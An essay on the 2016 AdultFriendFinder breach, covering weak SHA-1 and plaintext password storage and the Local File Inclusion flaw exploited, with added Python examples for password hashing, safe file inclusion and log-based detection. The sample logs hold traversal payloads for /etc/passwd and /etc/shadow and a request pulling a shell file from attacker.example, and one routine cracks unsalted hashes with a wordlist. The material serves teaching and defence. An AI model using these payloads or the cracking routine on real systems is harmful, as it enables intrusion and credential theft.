
In October 2016, the adult dating site “AdultFriendFinder” became the
victim of one of the largest personal data breaches ever recorded, with more
than 412 million account details being exposed. The leaked details included
customers’ email addresses, passwords, membership status, dates of visits,
information about the browsers they were using and even the IP addresses they
used for access. Adult Friend Finder’s parent company also owns other adult
sites, which suffered from the same attack, losing around 70 million account
details between them. One of the more surprising finds by the hackers was almost
16 million “deleted” accounts that had never actually been purged from the
company’s data. Along with these accounts, files were taken containing employee
names, their home IP addresses and even the VPN keys used to access the
company’s servers remotely. Many of these customer account details were soon
offered for sale on criminal marketplaces.

This was not the first time Adult Friend Finder had been hacked.
Back in May 2015, the personal data of around 4 million users was left exposed,
including not only their personal details but also their sexual preferences and
other sensitive personal information. That attack was performed by a hacker
going by the name “RORRG”, whose motivation was to collect revenge money which
was owed to “his guy”. Along with this and a further ransom demand, the attacks
ended in a total financial loss of around $350,000 (~£230,000) for Adult Friend
Finder, along with much public scrutiny of their online security policies.
Security experts have since been very critical of the site’s lack of care for
its users’ security and of it not doing enough to prevent another breach.


After being the victim of a successful and costly attack in the
past, it was surprising that the passwords stored in Adult Friend Finder’s
databases were either held in plain text or hashed with SHA-1, and those hashes
were cracked very quickly with minimal effort. This is terrible practice for a
company that handles so many people’s sensitive data on a daily basis,
especially considering it had been hacked the previous year. SHA-1 (Secure Hash
Algorithm 1) is a cryptographic hash function that was first published in 1995
and has been known to be vulnerable to attack for the last 10 years. Due to its
well-known flaws and the availability of a number of more reliable successor
hash algorithms, the U.S. National Institute of Standards and Technology banned
the use of SHA-1 by U.S. federal agencies in 2010, and digital certificate
authorities have not been allowed to issue SHA-1-signed certificates since
January 2016. This shows an extreme lack of care from AdultFriendFinder and
simple laziness on the security front.
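Added worked example (Python; not code from the essay or from Friend Finder): it shows why unsalted SHA-1 password hashes fall so quickly and what a modern store looks like instead. The point a practitioner should take from the paragraph above is that SHA-1’s collision weakness is not what makes password cracking fast; SHA-1 is simply a fast hash, and without a per-user salt one precomputed table covers every account at once. The wordlist, the sample users and passwords, and the `pbkdf2_sha256$` record format are all constructed for this example.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, Iterable, Optional

# Constructed for this example: a tiny "wordlist" of common passwords.
# Real wordlists run to millions of entries, which is why unsalted fast hashes fall.
SMALL_WORDLIST = ["123456", "password", "qwerty", "letmein", "iloveyou"]

PBKDF2_ITERATIONS = 200_000  # tune upward as hardware improves


def sha1_hex(password: str) -> str:
    """Unsalted SHA-1 of a password: the weak storage format the essay describes."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def build_sha1_lookup(wordlist: Iterable[str]) -> Dict[str, str]:
    """Precompute digest -> password once.

    With no salt, equal passwords give equal digests for every user, so this one
    table is reused against the whole credential table at no extra cost."""
    return {sha1_hex(w): w for w in wordlist}


def recover_unsalted(stored_digests: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {digest: password} for every stored SHA-1 digest present in the lookup."""
    table = build_sha1_lookup(wordlist)
    return {d: table[d] for d in stored_digests if d in table}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256; the record format is constructed here."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per user defeats shared lookup tables
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             PBKDF2_ITERATIONS, dklen=32)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations), dklen=32)
    return hmac.compare_digest(dk.hex(), dk_hex)


def classify_stored_credential(value: str) -> str:
    """Rough audit of what a credential column actually contains."""
    if value.startswith("pbkdf2_sha256$"):
        return "pbkdf2_sha256"
    if re.fullmatch(r"[0-9a-f]{40}", value):
        return "sha1"
    return "plaintext"


if __name__ == "__main__":
    # Constructed credential table in the weak format: two users, one weak password.
    weak_store = {"alice": sha1_hex("letmein"), "bob": sha1_hex("Tr0ub4dor&3")}
    cracked = recover_unsalted(weak_store.values(), SMALL_WORDLIST)
    for user, digest in weak_store.items():
        print(user, "->", cracked.get(digest, "<not in wordlist>"))
    good = hash_password("letmein")
    print(classify_stored_credential(good), verify_password("letmein", good))
```

The audit function is the practical starting point: run it over a sample of the credential column to learn what formats are actually present before deciding how to migrate them, and rehash each user with the salted form on their next successful login.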


Who is responsible?

Diana Ballou, vice president of FriendFinder Networks,
received “a number of reports that there were security vulnerabilities” and
followed up to explain: “While a number of these claims proved to be false
extortion attempts, we did identify and fix a vulnerability that was related to
the ability to access source code through an injection vulnerability” (ZDNet,
2016). This statement shows some obvious flaws in the way the company’s servers
were being run. The issue was first brought to light by a researcher who goes
by the alias “1×0123” or “Revolver”. Not long before the attack, Revolver posted
screenshots taken on Adult Friend Finder showing a Local File Inclusion
vulnerability being triggered. A Local File Inclusion (LFI) allows an attacker
to cause files stored elsewhere on the server to be included in the output of an
application, which can eventually allow an attacker to run malicious code on the
web server. Revolver went on to explain that the vulnerability was found in a
module on the production servers used by Adult Friend Finder.

A second notorious hacker going by the alias “Peace” also
admitted that he had breached Adult Friend Finder and had already passed some
of the information he had gathered on to a further group of hackers. Speaking
to Motherboard (Vice), “Peace said he had taken advantage of a backdoor that
was publicised on Hell (Hacking Forum) two years ago, and said he used it last
week to download a database of 73 million users” (Lorenzo
Franceschi-Bicchierai, 2016). The fact that Peace was able to use an exploit
that had been found and used over two years earlier on a similar site shows how
easy it was for someone to obtain the information needed to gain access to the
company’s servers and, furthermore, just how out of touch Adult Friend Finder’s
security was to allow a second attack like this. Peace followed up by agreeing
with Revolver’s claim that his attack was also via a Local File Inclusion.


How was it done?

The breach performed in October 2016 was a Local File
Inclusion (LFI) attack, something confirmed by two hackers who both claimed to
have infiltrated the site, and later confirmed by Adult Friend Finder
themselves. An LFI is a common vulnerability in poorly written web applications
and can grant an attacker access to a website and the ability to read files
from the system. Munin, a defensive security consultant, explains: “Such a flaw
can let hackers do “all kinds of things” including accessing any parts of the
server, running code on it, and even theoretically spying on users’ activities”
(Munin, 2016). A vulnerability like this, which gives an attacker complete
access and the ability to observe, can allow the attacker to essentially take
control of the web server. More importantly, it can be very hard to become
aware of a breach if the attacker is simply monitoring activity rather than
acting visibly on the access gained. This is even more serious on a network
such as Adult Friend Finder, which is constantly accepting and modifying
people’s private details and credentials.


The basis of the attack is that an attacker tricks the
web application into including files on the web server by exploiting
functionality that dynamically includes local files or scripts (Muscat, 2017).
A successful LFI attack like this can then lead to Remote Code Execution (RCE),
allowing an attacker to run commands on that system. These commands are often
used to elevate the attacker’s privileges on the system, granting them free
roam of the system and, furthermore, the internal network. Local File Inclusion
was listed as the second most recorded web application attack vector in
Akamai’s “Q3 2016 State of the Internet / Security Report”, behind SQL
injection (SQLi) (Curran, 2016).

The first thing an attacker must do when attacking through an
LFI vulnerability is to assess the application and identify any
vulnerabilities they can exploit. LFI attacks primarily take advantage of
web applications written in the PHP programming language. Since PHP is used by
around 75% of all websites today, this attack has become very common against
poorly written web applications. Any script found that includes a file from a
web server is a good candidate for further testing. For example (see Figure 1):

Figure 1 (Vulnerable PHP script, 2015)

An attacker would then attempt to exploit this by manipulating the file
location parameter. Once an LFI injection point has been found, the attacker
uses it to gather as much data as they can about the system. This can be done
very easily using a list of well-known file locations, such as /etc/passwd or
/etc/shadow. The following is an example of an attempt to exploit a
vulnerability by manipulating the file location parameter (see Figure 2); it
shows an attempt to display the contents of the /etc/passwd file on the system.

Figure 2 (Manipulating the File Location Parameter, 2015)

Shown below are the results of a successful exploitation of a web application
(see Figure 3).


Once the attacker has gained access to and knowledge of the system, they will
then proceed to place a file upload script in the system’s /tmp directory and,
using that upload, add further files to the system. Once the attacker has
managed to get their malicious code onto a web page, it is possible to convince
a PHP script to include a remote file instead of a presumably trusted file from
the local file system. If they succeed in including “external” files on the
victim’s web page, they can then execute commands as they wish on the victim’s
web server.

Shown below (see Figure 4) is an example in PHP of a
vulnerability to LFI. The PHP script executes on the server side at runtime. It
shows how, by exploiting just two lines of code, the attacker can trick the
application into taking a file and executing it, allowing them to upload
whatever they wish to the web server. From this point attackers are likely to
create or upload a script such as a “web shell”. A web shell is a script
uploaded to the web server that allows remote administration of the machine.
This can sometimes lead to the attacker gaining access to the internal network
and to other internal hosts. It is these web shells that allow hackers to
harvest sensitive data and credentials. This is likely to have been what
happened in the Adult Friend Finder case, allowing the attackers to gain access
to multiple web servers and databases belonging to many different sites.

Figure 4 (PHP Vulnerability to Local File Inclusion (LFI), 2016)
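Because the Figure 4 code itself does not survive on this page, here is an added example, written in Python rather than PHP and not taken from the essay or from the site, of the same two-line pattern and its hardened form. A request parameter names the page to include; the unsafe resolver trusts the parameter as-is, while the safe one checks it against an allowlist and then confirms that the canonical path still lies inside the pages directory. The demo site layout, the page names and the config file are all constructed for this example.

```python
import tempfile
from pathlib import Path

# Pages the application is actually meant to include: the allowlist.
ALLOWED_PAGES = {"home", "about"}


class IncludeRejected(ValueError):
    """Raised when a requested include fails validation."""


def make_demo_site() -> Path:
    """Constructed demo layout: pages/ holds includable pages, config.php sits above it."""
    root = Path(tempfile.mkdtemp(prefix="lfi_demo_"))
    pages = root / "pages"
    pages.mkdir()
    (pages / "home.php").write_text("<h1>Home</h1>")
    (pages / "about.php").write_text("<h1>About</h1>")
    # Outside pages/: must never be reachable through the include parameter.
    (root / "config.php").write_text("<?php $db_password = 'example-secret';")
    return root


def resolve_include_unsafe(pages_dir: Path, requested: str) -> Path:
    """The vulnerable pattern: the request parameter is joined to a path untouched,
    the equivalent of PHP's include() on a directory prefix plus $_GET['page']."""
    return Path(str(pages_dir) + "/" + requested)


def resolve_include_safe(pages_dir: Path, requested: str) -> Path:
    """Hardened resolver: allowlist first, canonical containment check second."""
    # 1. Only names the application knows about. This alone stops traversal,
    #    absolute paths, null bytes and remote URLs.
    if requested not in ALLOWED_PAGES:
        raise IncludeRejected("page not in allowlist: %r" % requested)
    # 2. Defence in depth: resolve symlinks and '..' and confirm the final path
    #    still has the pages directory as its direct parent.
    base = pages_dir.resolve()
    candidate = (base / (requested + ".php")).resolve()
    if candidate.parent != base:
        raise IncludeRejected("resolved path escapes pages directory")
    if not candidate.is_file():
        raise IncludeRejected("page file missing: %s" % candidate.name)
    return candidate


def include_allowed(pages_dir: Path, requested: str) -> bool:
    """True if the safe resolver would accept the request, False otherwise."""
    try:
        resolve_include_safe(pages_dir, requested)
        return True
    except IncludeRejected:
        return False


def render(pages_dir: Path, requested: str, resolver) -> str:
    """Stand-in for the PHP include: read the resolved file and return its text."""
    return resolver(pages_dir, requested).read_text()


if __name__ == "__main__":
    pages = make_demo_site() / "pages"
    print(render(pages, "about", resolve_include_safe))
    # The unsafe resolver happily serves the file above the pages directory.
    print(render(pages, "../config.php", resolve_include_unsafe))
    for req in ("home", "../config.php", "../../etc/passwd", "/etc/passwd"):
        print("%-20s allowed=%s" % (req, include_allowed(pages, req)))
```

The allowlist is the control that matters: once the parameter can only select from a fixed set of names, the traversal, absolute-path and remote-URL variants the essay describes have nothing to act on. The containment check costs one extra line and protects against the next developer adding a lookup that bypasses the allowlist.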


Shown here (see Figure 5) is an example of a file an attacker
may upload, which will be run as the user running the web application, allowing
the attacker to run any code they wish.

Figure 5 (Example of Attacker file upload, 2016)


How to prevent LFI attacks?

There are many things that a company can and should do to
prevent being hit by an LFI attack, and it all comes down to eliminating LFI
vulnerabilities. This starts with securing the PHP code of the website and not
leaving any opening for attackers. It is critical for companies operating such
sites to use application security testing software, along with competent web
developers to create and maintain the site and provide on-going security.
Security testing software scans for and identifies known code vulnerabilities
and helps address industry compliance regulations, something that was lacking
in every area at Adult Friend Finder. It is important to perform these tests
often, with up-to-date software, as attackers are constantly finding new
exploits in order to gain access.
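The essay’s advice leans on scanning tools; a defender also wants to see attempts in the web server’s own logs. The following is an added detection example in Python (not the essay’s or the site’s code) run over a handful of constructed access log lines. It percent-decodes the request URL repeatedly so that double-encoded traversal is not missed, then flags the indicators the essay itself describes: `../` traversal, requests naming /etc/passwd or /etc/shadow, and a remote URL supplied as the include parameter. The IP addresses, timestamps, hostnames and log lines are all constructed.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote

# Constructed access log lines in common log format (hypothetical hosts and times).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2016:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [12/Oct/2016:10:01:05 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1840
203.0.113.7 - - [12/Oct/2016:10:01:09 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 221
203.0.113.7 - - [12/Oct/2016:10:01:13 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1840
198.51.100.4 - - [12/Oct/2016:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 600
198.51.100.4 - - [12/Oct/2016:10:02:30 +0000] "GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Files the essay names as the attacker's first reads after finding an injection point.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %252e%252e (double-encoded '..') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def lfi_indicators(target: str) -> List[str]:
    """Return the reasons a request target looks like an LFI attempt (empty = clean)."""
    decoded = fully_decode(target).lower()
    query = decoded.partition("?")[2]  # inspect only the parameters, not the script path
    reasons = []
    if "../" in query or "..\\" in query:
        reasons.append("directory traversal")
    for path in SENSITIVE_FILES:
        if path in query:
            reasons.append("sensitive file " + path)
    if re.search(r"=(https?|ftp)://", query):
        reasons.append("remote URL in parameter")
    if "\x00" in query:
        reasons.append("null byte")
    return reasons


def scan_access_log(text: str) -> List[Dict]:
    """Parse each line and keep those with indicators, with the response status for triage."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        reasons = lfi_indicators(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings


def successful_hits(findings: List[Dict]) -> List[Dict]:
    """A 200 on a traversal request means the application served something: escalate."""
    return [f for f in findings if f["status"] == 200]


def hits_per_source(findings: List[Dict]) -> Counter:
    """Count flagged requests per client address to spot a single probing source."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], ", ".join(f["reasons"]), f["target"])
    print("sources:", dict(hits_per_source(found)))
    print("served with 200:", len(successful_hits(found)))
```

The status code is what turns a list of attempts into an incident: a 403 says the request was blocked, while a 200 with a response body the size of a real file says the application included it, and that host and time window are where forensic work should start.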



The fact that the Adult Friend Finder network lost over 412
million accounts’ worth of details, just a year after being breached in a
similar manner, shows an inexcusable lack of care for customers’ private
details and credentials. The company had made little to no improvement to its
security, in regard to both its web servers and the protection of the data
stored in its databases. The company not only used password hashing that had
been outdated by many years, but even held some employee and user information
in plain text. This attack has gone down as one of the biggest data breaches to
date and has set an example to other large web-based companies of the
importance of their security policies and infrastructure. Locating and taking
advantage of an LFI vulnerability has become easy and accessible to anyone,
since the software required can be acquired online along with numerous
in-depth tutorials giving step-by-step instructions on how to carry out such an
attack. This is one of the reasons this kind of attack has quickly become one
of the most popular attacks carried out in today’s online society. With so much
information publicly available about how to carry out these attacks, one would
expect companies to be investing just as heavily in security and in preventing
such attacks against themselves.

